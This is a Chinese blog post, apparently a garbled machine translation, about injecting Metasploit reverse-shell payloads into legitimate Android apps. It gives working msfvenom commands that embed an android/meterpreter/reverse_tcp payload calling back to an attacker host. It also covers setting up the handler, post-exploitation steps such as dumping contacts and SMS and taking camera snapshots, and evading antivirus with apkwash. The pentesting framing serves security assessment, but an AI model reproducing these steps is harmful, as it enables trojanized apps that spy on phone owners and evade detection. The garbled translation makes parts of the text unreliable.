设备/客户端安全

使用Metasploit后门注入Android应用程序

字号+ 作者:蜗蜗侠翻译 来源:转载 2017-07-04 09:45 我要评论( )

为 了利用用户的实际设备,使用合法的Android应用程序作为特洛伊木马是可能的。这个测试在每个Android安全评估中之所以重要的原因是因为它允许 渗透测试人员发现在......

为 了利用用户的实际设备,使用合法的Android应用程序作为特洛伊木马是可能的。这个测试在每个Android安全评估中之所以重要的原因是因为它允许 渗透测试人员发现在二进制文件周围是否存在某些保护。如果没有,可将应用程序的木马病毒的恶意攻击者然后客户端应该知道。

过程注入Metasploit的有效载荷送入Android应用都可以进行手动和自动。这篇文章将研究自动化过程。然而,如果在约定的时间是不是一个因素然后手动方法应考虑。

nbefore其他有效载荷的需要产生的,它将以妥协的移动设备。metasploit框架可用于这一活动,因为它可以产生一个有效载荷,然后提取为apk文件。

root@kali:~# msfvenom -p android/meterpreter/reverse_tcp
LHOST=192.168.1.76 LPORT=4444 R > pentestlab.apk

 

 
手动Android有效载荷生成

手动Android有效载荷生成

 

注射的有效载荷为apk

nbefore有效载荷的注射,它已经产生以上就要有目标的APK文件。本文检索APK文件可以用于指导获得apk文件从手机应用程序是否已安装或直接通过谷歌Play商店。

各种脚本公开可以为一个Android应用程序注入Metasploit的有效载荷。然而在某些情况下,可以使用msfvenom以及为了创建和自动注入Metasploit的有效载荷。

root@kali:~# msfvenom -x CameraSample.apk -p android/meterpreter/reverse_tcp
LHOST=192.168.1.76 LPORT=4444 -o CameraSample_backdoored.apk

msfvenom将反编译的应用,它将试图发现钩点的有效载荷将注射。此外,它还会对应用程序的Android清单文件进行毒性攻击,并有额外的权限,可用于开发后活动。输出可以在下面看到:
msfvenom载荷注入

msfvenom载荷注入

为本条的目的apkinjector已被用来作为工具来执行负载注入活性。它可以用来执行相同工作的其他脚本是:

 

 
 

注:它被用于本文的演示Android应用程序是一个现实世界的应用程序,它已被命名为明显的原因target.apk。apk喷油器将使用apktool反编译为充分的应用,将有效载荷并重新编译并签名。

APK Injector
apk注射器–解码APK
然后将APK注射器注入有效载荷在一个文件并再次使用Apktool编译和符号的应用。
APK Injector - Building the Inject APK

apk注射器–建筑注入的APK
Metasploit应该配置为接收有效载荷:

 
 
Metasploit Multi Handler - Android Payload

Metasploit的–处理Android的有效载荷

从有效载荷处理Android的那一刻起,用户将自己的手机上安装和有效载荷将执行与Meterpreter会话打开修改APK将返回。

Meterpreter via Injected APK

通过恶意APK Meterpreter

有一个任务列表,可以在开发后完成,比如检查设备是否生根,转储联系人列表,检索手机的SMS消息,或者只使用相机电话快照。所有这些活动都依赖于承载有效负载的应用程序的权限,这些应用程序在Android清单文件中定义。

Android Post Exploitation

Android开发后

Android Post Exploitation - Camera Snapshot

Android后开发-相机快照

病毒逃避

NIF装置具有安装杀毒软件然后根据产品的有效载荷可以防止在设备上执行。但是可以逃避杀毒软件的使用apkwash。这个脚本将修改所有的字符串和文件结构进行规避,然后它会随着使用apktool重建计划。

APK Wash

apk–杀毒逃过

结果可以通过上传最终的APK到nodistribute.com网站验证:

从一些已知的杀毒厂商只有卡巴斯基能够检测恶意APK增加成功率,恶意的有效载荷能够部署在装置。各种各样的工具,如面纱和庇护所,可以用来使防毒规避更有效。

 


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Client/644.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~